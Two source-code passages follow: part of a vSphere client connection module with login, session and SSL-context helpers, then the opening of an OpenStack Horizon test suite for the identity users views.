self.obj = obj
def __enter__(self):
return self.obj
def __exit__(self, *exc_info):
self.obj.close()
class VimSessionOrientedStub(SessionOrientedStub):
'''A vim-specific SessionOrientedStub. See the SessionOrientedStub class
in pyVmomi/SoapAdapter.py for more information.'''
# The set of exceptions that should trigger a relogin by the session stub.
SESSION_EXCEPTIONS = (
vim.fault.NotAuthenticated,
)
@staticmethod
def makeUserLoginMethod(username, password, locale=None):
'''Return a function that will call the vim.SessionManager.Login() method
with the given parameters. The result of this function can be passed as
the "loginMethod" to a SessionOrientedStub constructor.'''
def _doLogin(soapStub):
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
si.content.sessionManager.Login(username, password, locale)
return _doLogin
@staticmethod
def makeExtensionLoginMethod(extensionKey):
'''Return a function that will call the vim.SessionManager.Login() method
with the given parameters. The result of this function can be passed as
the "loginMethod" to a SessionOrientedStub constructor.'''
def _doLogin(soapStub):
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
si.content.sessionManager.LoginExtensionByCertificate(extensionKey)
return _doLogin
@staticmethod
def makeCertHokTokenLoginMethod(stsUrl, stsCert=None):
'''Return a function that will call the vim.SessionManager.LoginByToken()
after obtaining a HoK SAML token from the STS. The result of this function
can be passed as the "loginMethod" to a SessionOrientedStub constructor.
@param stsUrl: URL of the SAML Token issuing service. (i.e. SSO server).
@param stsCert: public key of the STS service.
'''
assert(stsUrl)
def _doLogin(soapStub):
from . import sso
cert = soapStub.schemeArgs['cert_file']
key = soapStub.schemeArgs['key_file']
authenticator = sso.SsoAuthenticator(sts_url=stsUrl,
sts_cert=stsCert)
samlAssertion = authenticator.get_hok_saml_assertion(cert,key)
def _requestModifier(request):
return sso.add_saml_context(request, samlAssertion, key)
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
with soapStub.requestModifier(_requestModifier):
try:
soapStub.samlToken = samlAssertion
si.content.sessionManager.LoginByToken()
finally:
soapStub.samlToken = None
return _doLogin
@staticmethod
def makeCredBearerTokenLoginMethod(username,
password,
stsUrl,
stsCert=None):
'''Return a function that will call the vim.SessionManager.LoginByToken()
after obtaining a Bearer token from the STS. The result of this function
can be passed as the "loginMethod" to a SessionOrientedStub constructor.
@param username: username of the user/service registered with STS.
@param password: password of the user/service registered with STS.
@param stsUrl: URL of the SAML Token issueing service. (i.e. SSO server).
@param stsCert: public key of the STS service.
'''
assert(username)
assert(password)
assert(stsUrl)
def _doLogin(soapStub):
from . import sso
cert = soapStub.schemeArgs['cert_file']
key = soapStub.schemeArgs['key_file']
authenticator = sso.SsoAuthenticator(sts_url=stsUrl,
sts_cert=stsCert)
samlAssertion = authenticator.get_bearer_saml_assertion(username,
password,
cert,
key)
si = vim.ServiceInstance("ServiceInstance", soapStub)
sm = si.content.sessionManager
if not sm.currentSession:
try:
soapStub.samlToken = samlAssertion
si.content.sessionManager.LoginByToken()
finally:
soapStub.samlToken = None
return _doLogin
def Connect(host='localhost', port=443, user='root', pwd='',
service="hostd", adapter="SOAP", namespace=None, path="/sdk",
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
version=None, keyFile=None, certFile=None, thumbprint=None,
sslContext=None, b64token=None, mechanism='userpass', disableSslCertValidation=False):
"""
Connect to the specified server, login and return the service
instance object.
Throws any exception back to caller. The service instance object is
also saved in the library for easy access.
Clients should modify the service parameter only when connecting to
a VMOMI server other than hostd/vpxd. For both of the latter, the
default value is fine.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param user: User
@type user: string
@param pwd: Password
@type pwd: string
@param service: Service
@type service: string
@param adapter: Adapter
@type adapter: string
@param namespace: Namespace *** Deprecated: Use version instead ***
@type namespace: string
@param path: Path
@type path: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
@param version: Version
@type version: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@param b64token: base64 encoded token
@type b64token: string
@param mechanism: authentication mechanism: userpass or sspi
@type mechanism: string
@type disableSslCertValidation: bool
@param disableSslCertValidation: Creates an unverified SSL context when True.
"""
try:
info = re.match(_rx, host)
if info is not None:
host = info.group(1)
if host[0] == '[':
host = info.group(1)[1:-1]
if info.group(2) is not None:
port = int(info.group(2)[1:])
except ValueError as ve:
pass
sslContext = getSslContext(host, sslContext, disableSslCertValidation)
if namespace:
assert(version is None)
version = versionMap[namespace]
elif not version:
version = "vim.version.version6"
si, stub = None, None
if mechanism == 'userpass':
si, stub = __Login(host, port, user, pwd, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, connectionPoolTimeout)
elif mechanism == 'sspi':
si, stub = __LoginBySSPI(host, port, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, b64token, connectionPoolTimeout)
else:
raise Exception('''The provided connection mechanism is not available, the
supported mechanisms are userpass or sspi''')
SetSi(si)
return si
# ConnectNoSSL() is deprecated. Use Connect(disableSslCertValidation=True).
def ConnectNoSSL(host='localhost', port=443, user='root', pwd='',
service="hostd", adapter="SOAP", namespace=None, path="/sdk",
version=None, keyFile=None, certFile=None, thumbprint=None,
b64token=None, mechanism='userpass'):
"""
Provides a standard method for connecting to a specified server without SSL
verification. Useful when connecting to servers with self-signed certificates
or when you wish to ignore SSL altogether. Will attempt to create an unverified
SSL context and then connect via the Connect method.
"""
sslContext = ssl._create_unverified_context()
return Connect(host=host,
port=port,
user=user,
pwd=pwd,
service=service,
adapter=adapter,
namespace=namespace,
path=path,
version=version,
keyFile=keyFile,
certFile=certFile,
thumbprint=thumbprint,
sslContext=sslContext,
b64token=b64token,
mechanism=mechanism)
def Disconnect(si):
"""
Disconnect (logout) service instance
@param si: Service instance (returned from Connect)
"""
# Logout
__Logout(si)
SetSi(None)
## Method that gets a local ticket for the specified user
def GetLocalTicket(si, user):
try:
sessionManager = si.content.sessionManager
except Exception as e:
if type(e).__name__ == 'ExpatError':
msg = 'Malformed response while querying for local ticket: "%s"' % e
raise vim.fault.HostConnectFault(msg=msg)
else:
msg = 'Failed to query for local ticket: "%s"' % e
raise vim.fault.HostConnectFault(msg=msg)
localTicket = sessionManager.AcquireLocalTicket(userName=user)
with open(localTicket.passwordFilePath) as f:
content = f.read()
return localTicket.userName, content
## Private method that performs the actual Connect and returns a
## connected service instance object.
def __Login(host, port, user, pwd, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext,
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC):
"""
Private method that performs the actual Connect and returns a
connected service instance object.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param user: User
@type user: string
@param pwd: Password
@type pwd: string
@param service: Service
@type service: string
@param adapter: Adapter
@type adapter: string
@param version: Version
@type version: string
@param path: Path
@type path: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
"""
content, si, stub = __RetrieveContent(host, port, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, connectionPoolTimeout)
# Get a ticket if we're connecting to localhost and password is not specified
if host == 'localhost' and not pwd:
try:
(user, pwd) = GetLocalTicket(si, user)
except:
pass # This is not supported against vCenter, and connecting
# with an empty password is fine in debug builds
# Login
try:
x = content.sessionManager.Login(user, pwd, None)
except vim.fault.InvalidLogin:
raise
except Exception as e:
raise
return si, stub
## Private method that performs LoginBySSPI and returns a
## connected service instance object.
## Copyright (c) 2015 Morgan Stanley. All rights reserved.
def __LoginBySSPI(host, port, service, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, b64token,
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC):
"""
Private method that performs the actual Connect and returns a
connected service instance object.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param service: Service
@type service: string
@param adapter: Adapter
@type adapter: string
@param version: Version
@type version: string
@param path: Path
@type path: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@param b64token: base64 encoded token
@type b64token: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
"""
content, si, stub = __RetrieveContent(host, port, adapter, version, path,
keyFile, certFile, thumbprint, sslContext, connectionPoolTimeout)
if b64token is None:
raise Exception('Token is not defined for sspi login')
# Login
try:
x = content.sessionManager.LoginBySSPI(b64token)
except vim.fault.InvalidLogin:
raise
except Exception as e:
raise
return si, stub
## Private method that performs the actual Disonnect
def __Logout(si):
"""
Disconnect (logout) service instance
@param si: Service instance (returned from Connect)
"""
try:
if si:
content = si.RetrieveContent()
content.sessionManager.Logout()
except Exception as e:
pass
## Private method that returns the service content
def __RetrieveContent(host, port, adapter, version, path, keyFile, certFile,
thumbprint, sslContext, connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC):
"""
Retrieve service instance for connection.
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param adapter: Adapter
@type adapter: string
@param version: Version
@type version: string
@param path: Path
@type path: string
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
"""
# XXX remove the adapter and service arguments once dependent code is fixed
if adapter != "SOAP":
raise ValueError(adapter)
# Create the SOAP stub adapter
stub = SoapStubAdapter(host, port, version=version, path=path,
certKeyFile=keyFile, certFile=certFile,
thumbprint=thumbprint, sslContext=sslContext,
connectionPoolTimeout=connectionPoolTimeout)
# Get Service instance
si = vim.ServiceInstance("ServiceInstance", stub)
content = None
try:
content = si.RetrieveContent()
except vmodl.MethodFault:
raise
except Exception as e:
# NOTE (hartsock): preserve the traceback for diagnostics
# pulling and preserving the traceback makes diagnosing connection
# failures easier since the fault will also include where inside the
# library the fault occurred. Without the traceback we have no idea
# why the connection failed beyond the message string.
(type, value, traceback) = sys.exc_info()
if traceback:
fault = vim.fault.HostConnectFault(msg=str(e))
reraise(vim.fault.HostConnectFault, fault, traceback)
else:
raise vim.fault.HostConnectFault(msg=str(e))
return content, si, stub
## Get the saved service instance.
def GetSi():
""" Get the saved service instance. """
return _si
## Set the saved service instance.
def SetSi(si):
""" Set the saved service instance. """
global _si
_si = si
## Get the global saved stub
def GetStub():
""" Get the global saved stub. """
si = GetSi()
if si:
return si._GetStub()
return None;
## RAII-style class for managing connections
class Connection(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.si = None
def __enter__(self):
self.si = Connect(*self.args, **self.kwargs)
return self.si
def __exit__(self, *exc_info):
if self.si:
Disconnect(self.si)
self.si = None
class SmartConnection(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.si = None
def __enter__(self):
self.si = SmartConnect(*self.args, **self.kwargs)
return self.si
def __exit__(self, *exc_info):
if self.si:
Disconnect(self.si)
self.si = None
def __GetElementTree(protocol, server, port, path, sslContext, httpProxyHost=None, httpProxyPort=None):
"""
Private method that returns a root from ElementTree for a remote XML document.
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param server: Which server to connect to.
@type server: string
@param port: Port
@type port: int
@param path: Path
@type path: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
"""
if httpProxyHost:
kwargs = {"context": sslContext} if sslContext else {}
conn = http_client.HTTPSConnection(httpProxyHost, port=httpProxyPort, **kwargs)
conn.set_tunnel(server, port)
elif protocol == "https":
kwargs = {"context": sslContext} if sslContext else {}
conn = http_client.HTTPSConnection(server, port=port, **kwargs)
elif protocol == "http":
conn = http_client.HTTPConnection(server, port=port)
else:
raise Exception("Protocol " + protocol + " not supported.")
conn.request("GET", path)
response = conn.getresponse()
if response.status == 200:
try:
tree = ElementTree.fromstring(response.read())
return tree
except ExpatError:
pass
return None
## Private method that returns an ElementTree describing the API versions
## supported by the specified server. The result will be vimServiceVersions.xml
## if it exists, otherwise vimService.wsdl if it exists, otherwise None.
def __GetServiceVersionDescription(protocol, server, port, path, sslContext, httpProxyHost=None, httpProxyPort=None):
"""
Private method that returns a root from an ElementTree describing the API versions
supported by the specified server. The result will be vimServiceVersions.xml
if it exists, otherwise vimService.wsdl if it exists, otherwise None.
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param server: Which server to connect to.
@type server: string
@param port: Port
@type port: int
@param path: Path
@type path: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
"""
tree = __GetElementTree(protocol, server, port,
path + "/vimServiceVersions.xml", sslContext,
httpProxyHost, httpProxyPort)
if tree is not None:
return tree
tree = __GetElementTree(protocol, server, port,
path + "/vimService.wsdl", sslContext,
httpProxyHost, httpProxyPort)
return tree
## Private method that returns true if the service version description document
## indicates that the desired version is supported
def __VersionIsSupported(desiredVersion, serviceVersionDescription):
"""
Private method that returns true if the service version description document
indicates that the desired version is supported
@param desiredVersion: The version we want to see if the server supports
(eg. vim.version.version2.
@type desiredVersion: string
@param serviceVersionDescription: A root ElementTree for vimServiceVersions.xml
or vimService.wsdl.
@type serviceVersionDescription: root ElementTree
"""
root = serviceVersionDescription
if root.tag == 'namespaces':
# serviceVersionDescription appears to be a vimServiceVersions.xml document
if root.get('version') != '1.0':
raise RuntimeError('vimServiceVersions.xml has version %s,' \
' which is not understood' % (root.get('version')))
desiredVersionId = versionIdMap[desiredVersion]
supportedVersion = None
for namespace in root.findall('namespace'):
versionId = namespace.findtext('version')
if versionId == desiredVersionId:
return True
else:
for versionId in namespace.findall('priorVersions/version'):
if versionId.text == desiredVersionId:
return True
else:
# serviceVersionDescription must be a vimService.wsdl document
wsdlNS = 'http://schemas.xmlsoap.org/wsdl/'
importElement = serviceVersionDescription.find('.//{%s}import' % wsdlNS)
supportedVersion = versionMap[importElement.get('namespace')[4:]]
if IsChildVersion(supportedVersion, desiredVersion):
return True
return False
## Private method that returns the most preferred API version supported by the
## specified server,
def __FindSupportedVersion(protocol, server, port, path, preferredApiVersions, sslContext, httpProxyHost=None, httpProxyPort=None):
"""
Private method that returns the most preferred API version supported by the
specified server,
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param server: Which server to connect to.
@type server: string
@param port: Port
@type port: int
@param path: Path
@type path: string
@param preferredApiVersions: Acceptable API version(s) (e.g. vim.version.version3)
If a list of versions is specified the versions should
be ordered from most to least preferred.
@type preferredApiVersions: string or string list
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
"""
serviceVersionDescription = __GetServiceVersionDescription(protocol,
server,
port,
path,
sslContext,
httpProxyHost,
httpProxyPort)
if serviceVersionDescription is None:
return None
if not isinstance(preferredApiVersions, list):
preferredApiVersions = [ preferredApiVersions ]
for desiredVersion in preferredApiVersions:
if __VersionIsSupported(desiredVersion, serviceVersionDescription):
return desiredVersion
return None
def SmartStubAdapter(host='localhost', port=443, path='/sdk',
url=None, sock=None, poolSize=5,
certFile=None, certKeyFile=None,
httpProxyHost=None, httpProxyPort=80, sslProxyPath=None,
thumbprint=None, cacertsFile=None, preferredApiVersions=None,
acceptCompressedResponses=True,
connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
samlToken=None, sslContext=None, disableSslCertValidation=False):
"""
Determine the most preferred API version supported by the specified server,
then create a soap stub adapter using that version
The parameters are the same as for pyVmomi.SoapStubAdapter except for
version which is renamed to prefferedApiVersions
@param preferredApiVersions: Acceptable API version(s) (e.g. vim.version.version3)
If a list of versions is specified the versions should
be ordered from most to least preferred. If None is
specified, the list of versions support by pyVmomi will
be used.
@type preferredApiVersions: string or string list
@type disableSslCertValidation: bool
@param disableSslCertValidation: Creates an unverified SSL context when True.
"""
if preferredApiVersions is None:
preferredApiVersions = GetServiceVersions('vim25')
sslContext = getSslContext(host, sslContext, disableSslCertValidation)
supportedVersion = __FindSupportedVersion('https' if port > 0 else 'http',
host,
port,
path,
preferredApiVersions,
sslContext,
httpProxyHost,
httpProxyPort
)
if supportedVersion is None:
raise Exception("%s:%s is not a VIM server" % (host, port))
return SoapStubAdapter(host=host, port=port, path=path,
url=url, sock=sock, poolSize=poolSize,
certFile=certFile, certKeyFile=certKeyFile,
httpProxyHost=httpProxyHost, httpProxyPort=httpProxyPort,
sslProxyPath=sslProxyPath, thumbprint=thumbprint,
cacertsFile=cacertsFile, version=supportedVersion,
acceptCompressedResponses=acceptCompressedResponses,
connectionPoolTimeout=connectionPoolTimeout,
samlToken=samlToken, sslContext=sslContext)
def SmartConnect(protocol='https', host='localhost', port=443, user='root', pwd='',
service="hostd", path="/sdk", connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
preferredApiVersions=None, keyFile=None, certFile=None,
thumbprint=None, sslContext=None, b64token=None, mechanism='userpass',
disableSslCertValidation=False):
"""
Determine the most preferred API version supported by the specified server,
then connect to the specified server using that API version, login and return
the service instance object.
Throws any exception back to caller. The service instance object is
also saved in the library for easy access.
Clients should modify the service parameter only when connecting to
a VMOMI server other than hostd/vpxd. For both of the latter, the
default value is fine.
@param protocol: What protocol to use for the connection (e.g. https or http).
@type protocol: string
@param host: Which host to connect to.
@type host: string
@param port: Port
@type port: int
@param user: User
@type user: string
@param pwd: Password
@type pwd: string
@param service: Service
@type service: string
@param path: Path
@type path: string
@param connectionPoolTimeout: Timeout in secs for idle connections to close, specify negative numbers for never
closing the connections
@type connectionPoolTimeout: int
@param preferredApiVersions: Acceptable API version(s) (e.g. vim.version.version3)
If a list of versions is specified the versions should
be ordered from most to least preferred. If None is
specified, the list of versions support by pyVmomi will
be used.
@type preferredApiVersions: string or string list
@param keyFile: ssl key file path
@type keyFile: string
@param certFile: ssl cert file path
@type certFile: string
@param thumbprint: host cert thumbprint
@type thumbprint: string
@param sslContext: SSL Context describing the various SSL options. It is only
supported in Python 2.7.9 or higher.
@type sslContext: SSL.Context
@type disableSslCertValidation: bool
@param disableSslCertValidation: Creates an unverified SSL context when True.
"""
if preferredApiVersions is None:
preferredApiVersions = GetServiceVersions('vim25')
sslContext = getSslContext(host, sslContext, disableSslCertValidation)
supportedVersion = __FindSupportedVersion(protocol,
host,
port,
path,
preferredApiVersions,
sslContext)
if supportedVersion is None:
raise Exception("%s:%s is not a VIM server" % (host, port))
portNumber = protocol == "http" and -int(port) or int(port)
return Connect(host=host,
port=portNumber,
user=user,
pwd=pwd,
service=service,
adapter='SOAP',
version=supportedVersion,
path=path,
connectionPoolTimeout=connectionPoolTimeout,
keyFile=keyFile,
certFile=certFile,
thumbprint=thumbprint,
sslContext=sslContext,
b64token=b64token,
mechanism=mechanism,
disableSslCertValidation=disableSslCertValidation)
# SmartConnectNoSSL() is deprecated. Use SmartConnect(disableSslCertValidation=True).
def SmartConnectNoSSL(protocol='https', host='localhost', port=443, user='root', pwd='',
service="hostd", path="/sdk", connectionPoolTimeout=CONNECTION_POOL_IDLE_TIMEOUT_SEC,
preferredApiVersions=None, keyFile=None, certFile=None,
thumbprint=None, b64token=None, mechanism='userpass'):
"""
Provides a standard method for connecting to a specified server without SSL
verification. Useful when connecting to servers with self-signed certificates
or when you wish to ignore SSL altogether. Will attempt to create an unverified
SSL context and then connect via the SmartConnect method.
"""
sslContext = ssl._create_unverified_context()
return SmartConnect(protocol=protocol,
host=host,
port=port,
user=user,
pwd=pwd,
service=service,
path=path,
connectionPoolTimeout=connectionPoolTimeout,
preferredApiVersions=preferredApiVersions,
keyFile=keyFile,
certFile=certFile,
thumbprint=thumbprint,
sslContext=sslContext,
b64token=b64token,
mechanism=mechanism)
def OpenUrlWithBasicAuth(url, user='root', pwd='', verify=True):
"""
Open the specified URL, using HTTP basic authentication to provide
the specified credentials to the server as part of the request.
Returns the response as a file-like object.
"""
return requests.get(url, auth=HTTPBasicAuth(user, pwd), verify=verify)
def OpenPathWithStub(path, stub, verify=True):
"""
Open the specified path using HTTP, using the host/port/protocol
associated with the specified stub. If the stub has a session cookie,
it is included with the HTTP request. Returns the response as a
file-like object.
"""
from six.moves import http_client
if not hasattr(stub, 'scheme'):
raise vmodl.fault.NotSupported()
elif stub.scheme == http_client.HTTPConnection:
protocol = 'http'
verify = False
elif stub.scheme == http_client.HTTPSConnection:
protocol = 'https'
else:
raise vmodl.fault.NotSupported()
hostPort = stub.host
url = '%s://%s%s' % (protocol, hostPort, path)
headers = {}
if stub.cookie:
headers["Cookie"] = stub.cookie
return requests.get(url, headers=headers, verify=verify)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from socket import timeout as socket_timeout
from django.test.utils import override_settings
from django.urls import reverse
import mock
from openstack_dashboard import api
from openstack_dashboard.dashboards.identity.users import tabs
from openstack_dashboard.test import helpers as test
USERS_INDEX_URL = reverse('horizon:identity:users:index')
USER_CREATE_URL = reverse('horizon:identity:users:create')
USER_UPDATE_URL = reverse('horizon:identity:users:update', args=[1])
USER_DETAIL_URL = reverse('horizon:identity:users:detail', args=[1])
USER_CHANGE_PASSWORD_URL = reverse('horizon:identity:users:change_password',
args=[1])
class UsersViewTests(test.BaseAdminViewTests):
def _get_default_domain(self):
domain = {"id": self.request.session.get('domain_context',
None),
"name": self.request.session.get('domain_context_name',
None)}
return api.base.APIDictWrapper(domain)
def _get_users(self, domain_id):
if not domain_id:
users = self.users.list()
else:
users = [user for user in self.users.list()
if user.domain_id == domain_id]
return users
@test.create_mocks({api.keystone: ('user_list',
'get_effective_domain_id',
'domain_lookup')})
def test_index(self, with_domain=False):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
if not with_domain:
self.mock_get_effective_domain_id.return_value = domain_id
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = {domain.id: domain.name}
res = self.client.get(USERS_INDEX_URL)
self.assertTemplateUsed(res, 'identity/users/index.html')
self.assertItemsEqual(res.context['table'].data, users)
if domain_id:
for user in res.context['table'].data:
self.assertItemsEqual(user.domain_id, domain_id)
if with_domain:
self.mock_get_effective_domain_id.assert_not_called()
else:
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(test.IsHttpRequest(),
domain=domain_id,
filters=filters)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
def test_index_with_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_index(with_domain=True)
@override_settings(USER_TABLE_EXTRA_INFO={'phone_num': 'Phone Number'})
@test.create_mocks({api.keystone: ('user_create',
'get_default_domain',
'tenant_list',
'add_tenant_user_role',
'get_default_role',
'roles_for_user',
'role_list')})
def test_create(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
phone_number = "+81-3-1234-5678"
role = self.roles.first()
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_create.return_value = user
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = role
self.mock_roles_for_user.return_value = []
self.mock_add_tenant_user_role.return_value = None
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'description': user.description,
'email': user.email,
'password': user.password,
'project': self.tenant.id,
'role_id': self.roles.first().id,
'enabled': True,
'confirm_password': user.password,
'phone_num': phone_number}
res = self.client.post(USER_CREATE_URL, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(success=1)
self.mock_get_default_domain.assert_has_calls([
mock.call(test.IsHttpRequest()),
mock.call(test.IsHttpRequest(), False),
])
self.assertEqual(2, self.mock_get_default_domain.call_count)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=None)
kwargs = {'phone_num': phone_number}
self.mock_user_create.assert_called_once_with(
test.IsHttpRequest(), name=user.name, description=user.description,
email=user.email, password=user.password, project=self.tenant.id,
enabled=True, domain=domain_id, **kwargs)
self.mock_role_list.assert_called_once_with(test.IsHttpRequest())
self.mock_get_default_role.assert_called_once_with(
test.IsHttpRequest())
self.mock_roles_for_user.assert_called_once_with(
test.IsHttpRequest(), user.id, self.tenant.id)
self.mock_add_tenant_user_role.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id, user.id, role.id)
def test_create_with_domain(self):
domain = self.domains.get(id="1")
self.setSessionValues(domain_context=domain.id,
domain_context_name=domain.name)
self.test_create()
@test.create_mocks({api.keystone: ('user_create',
'get_default_domain',
'add_tenant_user_role',
'tenant_list',
'get_default_role',
'roles_for_user',
'role_list')})
def test_create_with_empty_email(self):
user = self.users.get(id="5")
domain = self._get_default_domain()
domain_id = domain.id
role = self.roles.first()
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_create.return_value = user
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = role
self.mock_add_tenant_user_role.return_value = None
self.mock_roles_for_user.return_value = []
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'description': user.description,
'email': "",
'enabled': True,
'password': user.password,
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': user.password}
res = self.client.post(USER_CREATE_URL, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(success=1)
self.mock_get_default_domain.assert_has_calls([
mock.call(test.IsHttpRequest()),
mock.call(test.IsHttpRequest(), False),
])
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.mock_user_create.assert_called_once_with(
test.IsHttpRequest(),
name=user.name,
description=user.description,
email=user.email,
password=user.password,
project=self.tenant.id,
enabled=True,
domain=domain_id)
self.mock_role_list.assert_called_once_with(test.IsHttpRequest())
self.mock_get_default_role.assert_called_once_with(
test.IsHttpRequest())
self.mock_add_tenant_user_role.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id, user.id, role.id)
self.mock_roles_for_user.assert_called_once_with(
test.IsHttpRequest(), user.id, self.tenant.id)
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'role_list',
'get_default_role')})
def test_create_with_password_mismatch(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = self.roles.first()
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'email': user.email,
'password': user.password,
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': "doesntmatch"}
res = self.client.post(USER_CREATE_URL, formData)
self.assertFormError(res, "form", None, ['Passwords do not match.'])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_domain, 2,
mock.call(test.IsHttpRequest()))
if api.keystone.VERSIONS.active >= 3:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id))
else:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), user=None))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_role_list, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_role, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'role_list',
'get_default_role')})
def test_create_validation_for_password_too_short(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = self.roles.first()
# check password min-len verification
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'email': user.email,
'password': 'four',
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': 'four'}
res = self.client.post(USER_CREATE_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_domain, 2,
mock.call(test.IsHttpRequest()))
if api.keystone.VERSIONS.active >= 3:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id))
else:
self.assert_mock_multiple_calls_with_same_arguments(
